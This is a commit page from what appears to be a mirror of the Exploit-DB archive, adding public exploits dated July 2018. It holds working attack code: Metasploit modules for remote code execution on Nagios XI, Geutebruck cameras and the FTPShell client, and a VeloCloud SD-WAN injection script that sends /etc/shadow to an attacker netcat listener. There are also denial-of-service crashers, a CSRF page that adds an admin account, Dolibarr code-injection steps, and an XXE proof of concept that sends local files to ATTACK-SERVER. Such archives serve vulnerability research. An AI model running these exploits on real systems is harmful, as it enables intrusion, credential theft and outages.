bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-07-03

Browse source 
11 changes to exploits/shellcodes

Core FTP LE 2.2 - Buffer Overflow (PoC)
SIPp 3.6 - Local Buffer Overflow (PoC)
Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)

Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection
FTPShell client 6.70 (Enterprise edition) - Stack Buffer Overflow (Metasploit)
Nagios XI 5.2.6-5.4.12 - Chained Remote Code Execution (Metasploit)

Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)
Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)
VMware NSX SD-WAN Edge < 3.1.2 - Command Injection
DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
Dolibarr ERP CRM  < 7.0.3 - PHP Code Injection

Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)
This commit is contained in:
Offensive Security 2018-07-03 05:01:48 +00:00
parent fdf8bfe785
commit e8a3702c6c
13 changed files with 957 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

34
exploits/hardware/dos/44965.py Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594
#Run exploit, result DOS
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,80)))
print "[+] Connection %d" % i
crash1 = "\x41"*4412 +"\X42"*1000
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed "
raw_input()
break

68
exploits/hardware/webapps/44957.rb Executable file
View file

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Geutebruck simple_loglistjs.cgi Remote Command Execution',
'Description' => %q{
This module exploits a an arbitrary command execution vulnerability. The
vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an
anonymous user to execute arbitrary commands with root privileges.
Firmware <= 1.12.0.19 are concerned.
Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware.
},
'Author' =>
[
'Nicolas Mattiocco', #CVE-2018-7520 (RCE)
'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-7520' ],
[ 'URL', 'http://geutebruck.com' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat bash',
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 20 2018'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']),
], self.class)
end
def exploit
header = "(){ :;}; "
encpayload = "#{header}#{payload.encoded}"
uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all")
print_status("#{rhost}:#{rport} - Attempting to exploit...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => uri
})
end
end

89
exploits/hardware/webapps/44959.py Executable file
View file

@ -0,0 +1,89 @@
#!/usr/bin/env python
# Exploit Title: Unauthenticated Command Injection vulnerability in VMware NSX SD-WAN by VeloCloud
# Date: 2018-06-29
# Exploit Author: paragonsec @ Critical Start
# Credit: Brian Sullivan from Tevora and Section 8 @ Critical Start
# Vendor Homepage: https://www.vmware.com
# Security Advisory: https://www.vmware.com/security/advisories/VMSA-2018-0011.html
# Version: 3.1.1
# CVE: CVE-2018-6961
import argparse
import requests
import sys
import collections
'''
This script will return execute whatever payload you placed within it.
Keep in mind that SD-WAN is running a slimmed down Linux version so obtaining a reverse shell isn't as simple as nc -e /bin/bash blah blah
The command within this script will send stdout of commands to your netcat listener. Feel free to change :)
'''
#Colors
OKRED = '\033[91m'
OKGREEN = '\033[92m'
ENDC = '\033[0m'
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Remote Host")
parser.add_argument("--source", help = "Victim WAN Interface (e.g ge1, ge2)")
parser.add_argument('--lhost', help = 'Local Host listener')
parser.add_argument('--lport', help = 'Local Port listener')
parser.add_argument('--func', help = 'Function to abuse (e.g traceroute, ping, dns)')
args = parser.parse_args()
# Check to ensure at least one argument has been passed
if len(sys.argv)==1:
parser.print_help(sys.stderr)
sys.exit(1)
rhost = args.rhost
source = args.source
lhost = args.lhost
lport = args.lport
func = args.func
# Payload to be sent to the victim. Change to whatever you like!
# This payload will cat /etc/passwd from fictim and pipe it into a netcat connection to your listener giving you the contents of /etc/passwd
payload = "$(cat /etc/shadow |nc " + lhost + " " + lport + ")"
exploit_url = "http://" + rhost + "/scripts/ajaxPortal.lua"
headers = [
('User-Agent','Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0'),
('Accept', 'application/json, text/javascript, */*; q=0.01'),
('Accept-Language', 'en-US,en;q=0.5'),
('Accept-Encoding', 'gzip, deflate'),
('Referer','http://' + rhost + '/'),
('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8'),
('X-Requested-With', 'XMLHttpRequest'),
('Cookie', 'culture=en-us'),
('Connection', 'close')
]
# probably not necessary but did it anyways
headers = collections.OrderedDict(headers)
# Setting up POST body parameters
if func == 'traceroute':
body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_diagnostic"
elif func == 'dns':
body = "name=google.com" + payload + "&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
else:
body = "destination=8.8.8.8" + payload + "&source=" + source + "&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic"
print(OKGREEN + "Author: " + ENDC + "paragonsec @ Critical Start (https://www.criticalstart.com)")
print(OKGREEN + "Credits: " + ENDC + "Brian Sullivan @ Tevora and Section 8 team @ Critical Start")
print(OKGREEN + "CVE: " + ENDC + "2018-6961")
print(OKGREEN + "Description: " + ENDC + "Multiple Unauthenticated Command Injection Vulnerabilities in VeloCloud SD-WAN GUI Application\n")
print(OKGREEN + "[+]" + ENDC + "Running exploit...")
s = requests.Session()
req = requests.post(exploit_url, headers=headers, data=body)
if "UNKNOWN_COMMAND" not in req.text:
print(OKGREEN + "[+]" + ENDC + "Exploit worked. Check listener!")
else:
print(OKRED + "[!]" + ENDC + "Exploit failed. You lose!")

28
exploits/linux/dos/44962.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: SIPp 3.6 - Local Buffer Overflow (PoC)
# Date: 2018-06-30
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: http://sipp.sourceforge.net/
# Software Link: https://github.com/SIPp/sipp/releases
# Version: 3.6-dev and earlier
# Tested on: 3.6-dev
$ ./sipp -3pcc `python -c print “A” * 300'`
#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x668d06 in main /home/user/sipp/src/sipp.cpp:1531:17
#2 0x7ff5ec21282f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
$ ./sipp -i `python -c print “A” * 300'`
#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66a303 in main /home/user/sipp/src/sipp.cpp:1477:17
#2 0x7f281302682f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)
$ ./sipp -log_file `python -c print “A” * 300'`
#0 0x448364 in strcpy /home/user/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:425
#1 0x66912f in main /home/user/sipp/src/sipp.cpp:1706:17
#2 0x7f6ca663782f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#3 0x41f1a8 in _start (/home/user/sipp/sipp+0x41f1a8)

363
exploits/linux/remote/44969.rb Executable file
View file

@ -0,0 +1,363 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Nagios XI Chained Remote Code Execution',
'Description' => %q{
This module exploits a few different vulnerabilities in Nagios XI 5.2.6-5.4.12 to gain remote root access.
The steps are:
1. Issue a POST request to /nagiosql/admin/settings.php which sets the database user to root.
2. SQLi on /nagiosql/admin/helpedit.php allows us to enumerate API keys.
3. The API keys are then used to add an administrative user.
4. An authenticated session is established with the newly added user
5. Command Injection on /nagiosxi/backend/index.php allows us to execute the payload with nopasswd sudo,
giving us a root shell.
6. Remove the added admin user and reset the database user.
},
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave' # @iotennui
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => ['printf'],
'Targets' =>
[
[
'Nagios XI 5.2.6 <= 5.4.12',
upper_version: Gem::Version.new('5.4.12'),
lower_version: Gem::Version.new('5.2.6')
]
],
'References' =>
[
['EDB', '44560'],
['CVE', '2018-8733'],
['CVE', '2018-8734'],
['CVE', '2018-8735'],
['CVE', '2018-8736'],
['URL', 'http://blog.redactedsec.net/exploits/2018/04/26/nagios.html']
],
'Privileged' => true,
'DefaultOptions' => {
'WSFDELAY' => 30
},
'DisclosureDate' => 'Apr 17, 2018',
'DefaultTarget' => 0))
register_options(
[
#WSFDelay option is being ignored, getting around this with a call to Rex.sleep
#Sometimes Nagios doesn't execute commands immediately, so play with this parameter.
Opt::RPORT(80),
OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 15 ])
])
deregister_options('SRVHOST', 'SRVPORT')
end
def check
vprint_status "STEP 0: Get Nagios XI version string."
res = send_request_cgi!({
'method' => 'GET',
'uri' => '/nagiosxi/'
})
if !res || !res.get_html_document
fail_with(Failure::Unknown, 'Could not check nagios version')
end
if (@version = res.get_html_document.at('//input[@name = "version"]/@value').text)
@version = Gem::Version.new(@version)
vprint_good("STEP 0: Found Nagios XI version: #{@version.to_s}")
if @version < target[:lower_version]
vprint_bad('Try nagios_xi_chained for this version.')
elsif (@version <= target[:upper_version] && @version >= target[:lower_version])
return CheckCode::Appears
end
end
CheckCode::Safe
end
def set_db_user(usr, passwd)
step = usr == 'root' ? '1' : '6.1'
vprint_status "STEP #{step}: Setting Nagios XI DB user to #{usr}."
res = send_request_cgi({
'uri' => '/nagiosql/admin/settings.php',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => true,
'vars_post' => {
'txtRootPath'=>'nagiosql',
'txtBasePath'=>'/var/www/html/nagiosql/',
'selProtocol'=>'http',
'txtTempdir'=>'/tmp',
'selLanguage'=>'en_GB',
'txtEncoding'=>'utf-8',
'txtDBserver'=>'localhost',
'txtDBport'=>3306,
'txtDBname'=>'nagiosql',
'txtDBuser'=> usr,
'txtDBpass'=> passwd,
'txtLogoff'=>3600,
'txtLines'=>15,
'selSeldisable'=>1
}
})
if !res || res.code != 302
fail_with(Failure::UnexpectedReply,"STEP #{step}: Unexpected response setting db user to root")
end
vprint_status "STEP #{step}: Received a 302 Response. That's good!"
end
def get_api_keys
vprint_status 'STEP 2: Exploiting SQLi to extract user API keys.'
sqli_parm = @version < Gem::Version.new('5.3.0') ? 'backend_ticket' : 'api_key'
sqli_val = rand_text_alpha(rand(5) + 5)
res = send_request_cgi({
'uri' => '/nagiosql/admin/helpedit.php',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => true,
'vars_post' => {
'selInfoKey1'=>"#{sqli_val}'UNION SELECT CONCAT('START_API:',#{sqli_parm},':END_API') FROM nagiosxi.xi_users-- ",
'hidKey1'=>'common',
'selInfoKey2'=>'free_variables_name',
'hidKey2'=>'',
'selInfoVersion'=>'',
'hidVersion'=>'',
'taContent'=>'',
'modus'=>0
}
})
if !res || res.code != 302 || !res.body
fail_with(Failure::UnexpectedReply,'STEP 2: Unexpected response extracting api keys')
end
vprint_status 'STEP 2: Received a 302 Response. That\'s good!'
parse_api_key(res.body)
end
def parse_api_key(res_body)
begin_positions = res_body.enum_for(:scan, /START_API:/).map { Regexp.last_match.end(0) }
end_positions = res_body.enum_for(:scan, /:END_API/).map { Regexp.last_match.begin(0) - 1 }
api_keys = []
begin_positions.each_with_index do|val, i|
key = res_body[val..end_positions[i]]
unless api_keys.include?(key)
api_keys << key
end
end
if api_keys.length < 1
fail_with(Failure::Unknown, 'Could not parse api keys')
end
vprint_status "Found #{api_keys.length.to_s} unique api keys"
api_keys.each do |key|
vprint_status key
end
api_keys
end
def add_admin(keys, username, password)
vprint_status 'STEP 3: Using API Keys to add an administrative user...'
keys.each do |key|
user_id = try_add_admin(key, username, password)
if (user_id.to_i > 0)
vprint_good "Added user:#{username} password:#{password} userid:#{user_id}"
return user_id.to_s, key
end
end
fail_with(Failure::Unknown, 'STEP 3: Failed to add a user.')
end
def try_add_admin(key, username, passwd)
vprint_status "STEP 3: trying to add admin user with key #{key}"
res = send_request_cgi({
'uri'=> "/nagiosxi/api/v1/system/user",
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'vars_get' => {
'apikey' => key,
'pretty' => 1
},
'vars_post' =>{
'username' => username,
'password' => passwd,
'name' => rand_text_alpha(rand(5) + 5),
'email' =>"#{username}@localhost",
'auth_level' =>'admin',
'force_pw_change' => 0
}
})
json = res.get_json_document
json['userid'] ? json['userid'].to_i : -1
end
def delete_admin(key, user_id)
res = send_request_cgi({
'uri'=> "/nagiosxi/api/v1/system/user/#{user_id}",
'method' => 'DELETE',
'ctype' => 'application/x-www-form-urlencoded',
'vars_get' => {
'apikey' => key
}
})
res.body && res.body.include?('was added successfully') ? username : false
end
def login(username, password)
vprint_status "STEP 4.1: Authenticate as user #{username} with password #{password}"
#4.1 Get nsp for login
vprint_status 'STEP 4.1: Get NSP and nagiosxi for login..'
res = send_request_cgi({
'uri' =>'/nagiosxi/login.php',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded'
})
if !res || !res.body
fail_with(Failure::Unknown, 'STEP 4.1: Could not get nsp string for login')
end
login_nsp = parse_nsp_str(res.body)
vprint_status "STEP 4.1: login_nsp #{login_nsp} "
login_nagiosxi = parse_nagiosxi(res)
vprint_status "STEP 4.1: login_nagiosxi #{login_nagiosxi}"
vprint_status 'STEP 4.2: Authenticating...'
res = send_request_cgi({
'uri'=> '/nagiosxi/login.php',
'ctype' => 'application/x-www-form-urlencoded',
'method' => 'POST',
'cookie' => "nagiosxi=#{login_nagiosxi};",
'vars_post'=> {
'nsp' => login_nsp,
'page' => 'auth',
'debug' => '',
'pageopt' => 'login',
'username' => username,
'password' => password,
'loginButton' => ''
}
})
if !res || res.code != 302
fail_with(Failure::Unknown, 'STEP 4.2 Could not get authed nsp string.')
end
authed_nagiosxi = parse_nagiosxi(res)
vprint_status "STEP 4.2: authed_nagiosxi #{authed_nagiosxi}"
authed_nagiosxi
end
def parse_nsp_str(resp_body)
nsp_strs = /var nsp_str = "(.+)";\n/.match(resp_body)
unless nsp_strs || nsp_strs.length < 2
fail_with(Failure::NotFound, 'Could not find nsp_str')
end
nsp_strs[1]
end
def parse_nagiosxi(res)
cookie = res.get_cookies
matches = /.*nagiosxi=(.+);/.match(cookie)
unless matches || matches.length < 2
fail_with(Failure::NotFound, 'Could not find nagiosxi cookie')
end
matches[1]
end
def execute_command(cmd, opts = {})
backup_file = rand_text_alpha(rand(5) + 10)
cmd_execution = "$(cp /usr/local/nagiosxi/scripts/reset_config_perms.sh /usr/local/nagiosxi/scripts/#{backup_file} ; echo \"#{cmd}\" > /usr/local/nagiosxi/scripts/reset_config_perms.sh ; sudo /usr/local/nagiosxi/scripts/reset_config_perms.sh) &"
cmd_cleanup = "$(mv /usr/local/nagiosxi/scripts/#{backup_file} /usr/local/nagiosxi/scripts/reset_config_perms.sh)"
opts_exec = {
'uri'=> '/nagiosxi/backend/index.php',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => "nagiosxi=#{@nagiosxi}",
'vars_get' => {
'cmd'=>'submitcommand',
'command'=>'1111',
'command_data'=> cmd_execution
}
}
opts_cleanup = {
'uri'=> '/nagiosxi/backend/index.php',
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'cookie' => "nagiosxi=#{@nagiosxi}",
'vars_get' => {
'cmd'=>'submitcommand',
'command'=>'1111',
'command_data'=> cmd_cleanup
}
}
vprint_status 'STEP 5.1: executing payload'
res = send_request_cgi(opts_exec)
if !res || res.code != 200
fail_with(Failure::Unknown, 'STEP 5.1: Command execution failed')
end
vprint_status 'STEP 5.2: removing scripts from disc'
res = send_request_cgi(opts_cleanup)
if !res || res.code != 200
fail_with(Failure::Unknown, 'STEP 5.2: Command cleanup failed')
end
end
def exploit
if check != CheckCode::Appears
fail_with(Failure::NotVulnerable, 'STEP 0: Vulnerable version not found! punt!')
end
set_db_user('root', 'nagiosxi')
keys = get_api_keys
username = rand_text_alpha(rand(6) + 10)
password = rand_text_alpha(rand(6) + 10)
user_id, key = add_admin(keys, username, password)
@nagiosxi = login(username, password)
execute_cmdstager()
#revert databaseuser
set_db_user('nagiosql', 'n@gweb')
vprint_status 'STEP 6.2: deleting admin'
delete_admin(key, user_id)
#The WSFDelay option is being ignored currently, so this is this workaround.
Rex.sleep(datastore['WAIT'].to_i)
end
end

25
exploits/php/webapps/44960.html Normal file
View file

@ -0,0 +1,25 @@
<!--
# Exploit Title: DAMICMS 6.0.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2018-06-30
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9248562.html
# Software Link: https://www.damicms.com/Down#
# Version: DAMICMS_V6.0.0
# CVE : N/A
# DamiCMS v6.0.0 allows CSRF via admin.php?s=/Admin/doadd to add an administrator account.
# The payload for attack is as follows.
-->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://Target/dami/admin.php?s=/Admin/doadd" method="POST">
<input type="hidden" name="username" value="test22" />
<input type="hidden" name="password" value="test22" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="Submit" value="添加" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

32
exploits/php/webapps/44964.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: Unauthenticated Remote Code Evaluation in Dolibarr ERP CRM =<7.0.3
# Date: 06/29/2018
# Exploit Author: om3rcitak - https://omercitak.com
# Vendor Homepage: https://dolibarr.org
# Software Link: https://github.com/Dolibarr/dolibarr
# Version: =<7.0.3
# Tested on: Unix, Windows
## Technical Details
URL: http://{domain}/{dolibarr_path}/install/step1.php
Parameter Name: db_name
Parameter Type: POST
Attack Pattern: x\';system($_GET[cmd]);//
## Steps to reproduce the behavior
- Go to fresh install page.
- Click "Next Step" button for create example config file (conf/conf.php)
- Send this request:
```
POST {dolibarr_path}/install/step1.php HTTP/1.1
Host: {domain}
testpost=ok&action=set&main_dir=C%3A%2FAmpps%2Fwww&main_data_dir=C%3A%2FAmpps%2Fwww%2Fdocuments&main_url=http%3A%2F%2Flocalhost+&db_name=x%5C%27%3Bsystem(%24_GET%5Bcmd%5D)%3B%2F%2F&db_type=mysqli&db_host=localhost&db_port=3306&db_prefix=llx_&db_create_database=on&db_user=root&db_pass=root&db_create_user=on&db_user_root=root&db_pass_root=root&selectlang=auto
```
- Visit url and run the command: `http://{domain}/{dolibarr_path}/install/check.php?cmd=cat /etc/passwd`
## Timeline
- 06/29/2018 18:30 - Found vulnerability.
- 06/29/2018 18:44 - Report vendor.
- 06/29/2018 20:38 - Vulnerability fixed by vendor.
GitHub Issue: https://github.com/Dolibarr/dolibarr/issues/9032

50
exploits/windows/dos/44958.py Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Core FTP LE 2.2 - Buffer Overflow (PoC)
# Date: 2018-06-28
# Exploit Author: Berk Cem Göksel
# Vendor Homepage: http://www.coreftp.com/
# Software Link: http://www.coreftp.com/download
# Version: Core FTP Client LE v2.2 Build 1921
# Tested on: Windows 10
# Category: Dos
# CVE : CVE-2018-12113
# coding: utf-8
# Description:]
# The vulnerability was discovered during a vulnerability research lecture.
# This is meant to be a PoC.
#!/usr/bin/env python
import socket
IP = '0.0.0.0'
port = 21
Stack_beginning = 3004
buff = "\x90" * (3004)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send('215 UNIX Type: L8\r\n')
print conn.recv(1024)
conn.send('257 "/" is current directory.\r\n')
print conn.recv(1024)
conn.send('227 Entering Passive Mode (' + buff + ')\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')

112
exploits/windows/local/44961.txt Normal file
View file

@ -0,0 +1,112 @@
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-EMET-XML-INJECTION.txt
[+] ISR: Apparition Security
***Greetz: indoushka|Eduardo|Dirty0tis|cor3sm4sh3r***
Vendor:
================
www.microsoft.com
Product:
===========
Enhanced Mitigation Experience Toolkit (EMET)
Enhanced Mitigation Experience Toolkit is a freeware security toolkit for Microsoft Windows, developed by Microsoft.
It provides a unified interface to enable and fine-tune Windows security features.
Vulnerability Type:
===================
XML External Entity Injection
CVE Reference:
==============
N/A
Security Issue:
================
EMETs XML parser does not account for external entity declarations in ".config" files. This allows outbound network connections and users local files
to be exfiltrated to remote attacker controlled server. Conditions are a user must be tricked into importing a specially crafted XML file.
Exploit/POC:
=============
1) python -m SimpleHTTPServer
2) "payload.dtd"
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACK-SERVER:8000?%file;'>">
%all;
3) "config.xml"
import into EMET interface.
<?xml version="1.0"?>
<!DOCTYPE emet_poc [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://ATTACK-SERVER:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
Result seen on ATTACK-SERVER:
=============================
C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
PC - - [19/May/2018 22:53:02] "GET /payload.dtd HTTP/1.1" 200 -
PC - - [19/May/2018 22:53:02] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA8
0WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awa
ve=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 301 -
PC - - [19/May/2018 22:53:02] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA8
0WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awa
Network Access:
===============
Remote
Severity:
=========
High
Disclosure Timeline:
=============================
Vendor Notification: June 5, 2018
Vendor reply : "We determined your finding is valid but does not meet our bar for servicing" : June 30, 2018
June 30, 2018 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

103
exploits/windows/remote/44968.rb Executable file
View file

@ -0,0 +1,103 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'FTPShell client 6.70 (Enterprise edition) Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the FTPShell client 6.70 (Enterprise
edition) allowing remote code execution.
},
'Author' =>
[
'r4wd3r', # Original exploit author
'Daniel Teixeira' # MSF module author
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2018-7573'],
[ 'EDB', '44596' ]
],
'Payload' =>
{
'Space' => 400,
'BadChars' => "\x00\x22\x0d\x0a\x0b"
},
'Platform' => 'win',
'Targets' =>
[
# CALL ESI in FTPShell.exe : 0x00452eed
[ 'Windows Universal', {'Ret' => "\xed\x2e\x45" } ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'SRVHOST' => '0.0.0.0',
'EXITFUNC' => 'thread'
},
'DisclosureDate' => 'Mar 4 2017',
'DefaultTarget' => 0))
register_options [ OptPort.new('SRVPORT', [ true, 'The FTP port to listen on', 21 ]) ]
end
def exploit
srv_ip_for_client = datastore['SRVHOST']
if srv_ip_for_client == '0.0.0.0'
if datastore['LHOST']
srv_ip_for_client = datastore['LHOST']
else
srv_ip_for_client = Rex::Socket.source_address('50.50.50.50')
end
end
srv_port = datastore['SRVPORT']
print_status("Please ask your target(s) to connect to #{srv_ip_for_client}:#{srv_port}")
super
end
def on_client_connect(client)
p = regenerate_payload(client)
return if p.nil?
print_status("#{client.peerhost} - connected.")
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}") unless res.empty?
print_status("#{client.peerhost} - Response: Sending 220 Welcome")
welcome = "220 Welcome.\r\n"
client.put(welcome)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
print_status("#{client.peerhost} - Response: sending 331 OK")
user = "331 OK.\r\n"
client.put(user)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
print_status("#{client.peerhost} - Response: Sending 230 OK")
pass = "230 OK.\r\n"
client.put(pass)
res = client.get_once.to_s.strip
print_status("#{client.peerhost} - Request: #{res}")
sploit = '220 "'
sploit << payload.encoded
sploit << "\x20" * (payload_space - payload.encoded.length)
sploit << target.ret
sploit << "\" is current directory\r\n"
print_status("#{client.peerhost} - Request: Sending the malicious response")
client.put(sploit)
end
end

12
files_exploits.csv
View file

@ -6008,6 +6008,9 @@ id,file,description,date,author,type,platform,port
44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux,
44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80
44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware,
44958,exploits/windows/dos/44958.py,"Core FTP LE 2.2 - Buffer Overflow (PoC)",2018-07-02,"Berk Cem Göksel",dos,windows,21
44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux,
44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9797,6 +9800,7 @@ id,file,description,date,author,type,platform,port
44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
